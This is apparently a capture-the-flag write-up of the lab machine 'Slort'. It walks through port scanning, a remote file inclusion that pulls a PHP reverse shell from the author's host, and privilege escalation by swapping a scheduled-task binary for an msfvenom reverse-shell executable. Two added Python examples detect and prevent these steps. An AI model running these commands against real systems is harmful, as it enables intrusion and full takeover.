Slort
Network
- IP Target: 192.168.106.53
Enumeration
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Slort]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.106.53
[sudo] password for momphucker:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-28 14:41 CET
Nmap scan report for 192.168.106.53
Host is up (0.078s latency).
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
4443/tcp open pharos
5040/tcp open unknown
7680/tcp open pando-pub
8080/tcp open http-proxy
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Slort]
└─$ sudo nmap -Pn -sC -sV -p21,135,139,445,3306,4443,5040,7680,8080 -oN alltcp.txt 192.168.106.53
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-28 14:43 CET
Nmap scan report for 192.168.106.53
Host is up (0.070s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3306/tcp open mysql?
| fingerprint-strings:
| DNSStatusRequestTCP, FourOhFourRequest, GetRequest, HTTPOptions, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|_ Host '192.168.45.248' is not allowed to connect to this MariaDB server
4443/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.106.53:4443/dashboard/
5040/tcp open unknown
7680/tcp closed pando-pub
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.106.53:8080/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=12/28%Time=6770009A%P=aarch64-unknown-linu
SF:x-gnu%r(NULL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.248'\x20is\x2
SF:0not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r
SF:(GetRequest,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.248'\x20is\x20
SF:not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(
SF:HTTPOptions,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.248'\x20is\x20
SF:not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(
SF:RTSPRequest,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.248'\x20is\x20
SF:not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(
SF:RPCCheck,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.248'\x20is\x20not
SF:\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNS
SF:StatusRequestTCP,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.248'\x20i
SF:s\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server
SF:")%r(SSLSessionReq,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.248'\x2
SF:0is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20serv
SF:er")%r(TerminalServerCookie,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45
SF:\.248'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaD
SF:B\x20server")%r(TLSSessionReq,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.
SF:45\.248'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Mari
SF:aDB\x20server")%r(Kerberos,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\
SF:.248'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB
SF:\x20server")%r(SMBProgNeg,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.
SF:248'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\
SF:x20server")%r(FourOhFourRequest,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168
SF:\.45\.248'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Ma
SF:riaDB\x20server")%r(LPDString,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.
SF:45\.248'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Mari
SF:aDB\x20server")%r(LDAPSearchReq,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168
SF:\.45\.248'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Ma
SF:riaDB\x20server")%r(LDAPBindReq,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168
SF:\.45\.248'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Ma
SF:riaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-12-28T13:46:35
|_ start_date: N/A
Ports 4443, 8080
I look for further paths with gobuster:
┌──(momphucker㉿kali-vmw-warmachine)-[/usr/share/dirb/wordlists]
└─$ sudo gobuster dir -u http://192.168.106.53:8080 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 50 --exclude-length "0"
[sudo] password for momphucker:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.106.53:8080
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Exclude Length: 0
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 345] [--> http://192.168.106.53:8080/img/]
/site (Status: 301) [Size: 346] [--> http://192.168.106.53:8080/site/]
/licenses (Status: 403) [Size: 1205]
/examples (Status: 503) [Size: 1060]
/dashboard (Status: 301) [Size: 351] [--> http://192.168.106.53:8080/dashboard/]
/%20 (Status: 403) [Size: 1046]
/IMG (Status: 301) [Size: 345] [--> http://192.168.106.53:8080/IMG/]
/Site (Status: 301) [Size: 346] [--> http://192.168.106.53:8080/Site/]
/*checkout* (Status: 403) [Size: 1046]
/Img (Status: 301) [Size: 345] [--> http://192.168.106.53:8080/Img/]
/phpmyadmin (Status: 403) [Size: 1205]
/webalizer (Status: 403) [Size: 1046]
/*docroot* (Status: 403) [Size: 1046]
/* (Status: 403) [Size: 1046]
/con (Status: 403) [Size: 1046]
/Dashboard (Status: 301) [Size: 351] [--> http://192.168.106.53:8080/Dashboard/]
/http%3A (Status: 403) [Size: 1046]
/**http%3a (Status: 403) [Size: 1046]
/*http%3A (Status: 403) [Size: 1046]
/xampp (Status: 301) [Size: 347] [--> http://192.168.106.53:8080/xampp/]
/aux (Status: 403) [Size: 1046]
/**http%3A (Status: 403) [Size: 1046]
/%C0 (Status: 403) [Size: 1046]
/SITE (Status: 301) [Size: 346] [--> http://192.168.106.53:8080/SITE/]
[..]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
Under /site there is a PHP site:
which is vulnerable to Remote File Inclusion (RFI):
Exploit
I start a web server on my Kali machine on port 8081, serving the file php-reverse-shell.php, which contains the PHP code of the Ivan Sincek-style reverse shell available at revshells.com/.
I set up a listener on port 4444:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Slort]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
Finally I request the reverse shell file, served by my web server, like this:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Slort]
└─$ curl -X GET http://192.168.106.53:8080/site/index.php?page=http://192.168.45.248:8081/php-reverse-shell.php
And the shell opens:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Slort]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.106.53] 50774
SOCKET: Shell has connected! PID: 1116
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\site>whoami
slort\rupert
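The vulnerable behaviour above is an include() fed directly from the page= query parameter. The following is an added example, not code from this writeup or from the target's site: it shows what a defender would run over the web server's access log to spot such requests, and beside it the allowlist lookup a hardened index.php would use instead of passing the parameter to include(). The log lines, addresses and the ALLOWED_PAGES map are constructed for the example; the only thing taken from the page is the page= parameter name.

```python
"""Detect and prevent include() abuse via a 'page=' parameter (added example)."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log lines; client and attacker addresses are placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Dec/2024:14:50:01 +0100] "GET /site/index.php?page=main.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [28/Dec/2024:14:51:12 +0100] "GET /site/index.php?page=http://203.0.113.7:8081/shell.php HTTP/1.1" 200 88 "-" "curl/8.5.0"
10.0.0.9 - - [28/Dec/2024:14:51:20 +0100] "GET /site/index.php?page=..%2F..%2Fwindows%2Fwin.ini HTTP/1.1" 200 300 "-" "curl/8.5.0"
10.0.0.9 - - [28/Dec/2024:14:51:33 +0100] "GET /site/index.php?page=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dindex.php HTTP/1.1" 200 4000 "-" "curl/8.5.0"
10.0.0.5 - - [28/Dec/2024:14:52:02 +0100] "GET /site/index.php?page=contact.php HTTP/1.1" 200 640 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Values that would make include() leave the site directory.
REMOTE_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]*:)?//', re.IGNORECASE)   # http://, ftp://, //host
WRAPPER_RE = re.compile(r'^(?:php|data|expect|phar|zip|file|glob)://', re.IGNORECASE)


def classify_page_value(value: str) -> str:
    """Return 'ok', 'remote', 'wrapper' or 'traversal' for a page= value.

    parse_qs already decodes once; the extra unquote() catches double-encoded input.
    """
    v = unquote(value)
    if WRAPPER_RE.match(v):
        return "wrapper"
    if REMOTE_RE.match(v):
        return "remote"
    if ".." in v.replace("\\", "/").split("/"):
        return "traversal"
    return "ok"


def scan_log(text: str) -> list:
    """Flag every request whose page= parameter points outside the site directory."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for value in params.get("page", []):
            kind = classify_page_value(value)
            if kind != "ok":
                findings.append({"ip": m["ip"], "kind": kind,
                                 "value": unquote(value), "status": int(m["status"])})
    return findings


# Server-side fix: never include() the raw parameter; map it to a known file instead.
# The allowlist is an assumed example; the real site's page names are not on the page.
ALLOWED_PAGES = {"main": "main.php", "contact": "contact.php"}


def resolve_page(value: str, default: str = "main") -> str:
    """Return the file to include for a request, falling back to the default page."""
    name = value[:-4] if value.endswith(".php") else value
    return ALLOWED_PAGES.get(name, ALLOWED_PAGES[default])


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']}  {f['kind']:<9} status={f['status']}  page={f['value']}")
```

The scanner reports one finding for each of the three non-local values (a remote URL, a traversal sequence and a php:// wrapper) and ignores the two legitimate pages; the same three categories are exactly what the allowlist lookup in resolve_page() makes unreachable, since an unknown name can only ever resolve to a file the developer listed.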
I capture the local.txt flag:
Privilege Escalation
In the root of C: there is a Backup folder containing the following files:
C:\>dir Backup
Volume in drive C has no label.
Volume Serial Number is 6E11-8C59
Directory of C:\Backup
12/28/2024 09:11 AM <DIR> .
12/28/2024 09:11 AM <DIR> ..
06/12/2020 06:45 AM 11,304 backup.txt
06/12/2020 06:45 AM 73 info.txt
06/23/2020 06:49 PM 73,802 TFTP.exe
4 File(s) 92,347 bytes
2 Dir(s) 28,578,185,216 bytes free
The info.txt file has the following content:
This suggests that there may be a scheduled task running TFTP.exe every 5 minutes.
I therefore generate an executable to replace it, one that opens a shell to a listener on port 4455:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Slort]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.248 LPORT=4455 -f exe -o TFTP.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: TFTP.exe
I rename the original executable and upload the payload:
C:\Backup>ren TFTP.exe TFTP_OLD.exe
C:\Backup>curl http://192.168.45.248:8081/TFTP.exe -O TFTP.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 7168 100 7168 0 0 7168 0 0:00:01 --:--:-- 0:00:01 57344
After a few moments a shell as Administrator opens on the waiting listener:
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/Slort/Backup]
└─$ nc -nvlp 4455
listening on [any] 4455 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.106.53] 52357
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
slort\administrator
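The escalation works because a binary that a privileged scheduled task executes lives in a directory a low-privileged user can write to, so swapping the file is enough. The following is an added example, not part of this writeup: a minimal file-integrity baseline of the kind a defender keeps for every executable referenced by a scheduled task, which turns the rename-and-replace step above into an alert. The stand-in TFTP.exe contents are constructed; the check is filesystem-agnostic, and the permanent fix (removing write access for non-administrators on the task's directory) is a separate ACL change.

```python
"""Integrity baseline for binaries launched by scheduled tasks (added example)."""
import hashlib
import os
import tempfile
from pathlib import Path


def sha256_file(path) -> str:
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(paths) -> dict:
    """Record size and SHA-256 of each binary a scheduled task will execute."""
    return {str(p): {"sha256": sha256_file(p), "size": os.path.getsize(p)} for p in paths}


def verify_baseline(baseline: dict) -> list:
    """Return one finding per path whose hash changed or that went missing."""
    findings = []
    for path, rec in baseline.items():
        if not os.path.exists(path):
            findings.append({"path": path, "issue": "missing"})
            continue
        current = sha256_file(path)
        if current != rec["sha256"]:
            findings.append({"path": path, "issue": "modified",
                             "expected": rec["sha256"], "actual": current})
    return findings


def demo() -> list:
    """Simulate the swap: baseline a constructed TFTP.exe, replace it, re-verify."""
    with tempfile.TemporaryDirectory() as d:
        exe = Path(d) / "TFTP.exe"
        exe.write_bytes(b"MZ" + b"\x00" * 100)      # constructed stand-in, not a real binary
        base = build_baseline([exe])
        exe.rename(Path(d) / "TFTP_OLD.exe")         # the rename seen in the writeup
        exe.write_bytes(b"MZ" + b"\x90" * 100)       # a different file now sits at the task's path
        return verify_baseline(base)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['issue']}: {f['path']}")
```

Run periodically (for instance from the same scheduler, under an account the low-privileged user cannot modify), verify_baseline() reports the replaced file as "modified" before the task next fires; a baseline entry whose path no longer exists is reported as "missing", which catches the case where the original was renamed but no replacement was dropped.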
Finally I capture the proof.txt flag: